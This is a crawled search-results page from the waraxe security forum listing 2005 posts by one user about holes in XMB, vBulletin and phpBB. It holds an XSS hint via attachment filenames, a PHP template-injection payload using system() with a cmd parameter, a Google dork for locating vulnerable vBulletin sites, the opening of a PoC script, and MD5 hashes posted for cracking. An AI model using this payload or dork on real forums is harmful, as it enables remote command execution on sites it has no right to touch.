Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 781
Members: 0
Total: 781
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index
Search found 6 matches
xmb 1.9 final
PostForum: Newbies corner   Posted: Sat Mar 26, 2005 6:29 am   Subject: xmb 1.9 final
pokleyzz
 
Replies: 5
Views: 12839




fresh XSS bug
----------------
1) filename is not sanitize when send attachement .. can insert html code .. but can't have filename with "/"
2) change mime-type to "Text/html" for easy XSS attack ...
XMB, php code injection, help anyone?
PostForum: XMB forum   Posted: Fri Mar 25, 2005 7:52 am   Subject: XMB, php code injection, help anyone?
pokleyzz
 
Replies: 1
Views: 10458




just edit any template example "faq" insert "${${system($cmd)}}" and request http://<forum>/faq.php?cmd=<command>
Rainbow Crack
PostForum: MD5 hashes   Posted: Thu Mar 03, 2005 6:35 pm   Subject: Rainbow Crack
pokleyzz
 
Replies: 209
Views: 246736




can you try this .. Embarassed

952d4282d03225cebbe16b27f873e19b
d31959f62f6955a47420d4d4069f4fdc
04e11bfe3e3a85f36842a13b540ef913
c1d87c003a17240abdc43505fc015580
ae21370e3292d3adfe5fbdbe6c9d702d
Vbullettin 3.0.x forumdisplay.php PHP command Execution
PostForum: All other software   Posted: Thu Feb 17, 2005 10:53 pm   Subject: Vbullettin 3.0.x forumdisplay.php PHP command Execution
pokleyzz
 
Replies: 7
Views: 16393





* 1st condition : $vboptions
searching something like this `inurl:"forumdisplay" +"Currently Active Users" +"vBulletin Version 3.0.3"` in google will help find one.

You can create the third con ...
vulns in phpbb 2.0.10
PostForum: PhpBB   Posted: Thu Feb 17, 2005 11:55 am   Subject: PoC for phpnuke + phpbb
pokleyzz
 
Replies: 58
Views: 75185




Just want to share old stuff Smile

#!/usr/bin/php -q
<?php
/*
# phpnuke + phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 ...
Vbullettin 3.0.x forumdisplay.php PHP command Execution
PostForum: All other software   Posted: Thu Feb 17, 2005 11:48 am   Subject: PoC
pokleyzz
 
Replies: 7
Views: 16393




http://www.securityfocus.com/archive/attachment/390667/2/
Page 1 of 1
All times are GMT
  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.134 Seconds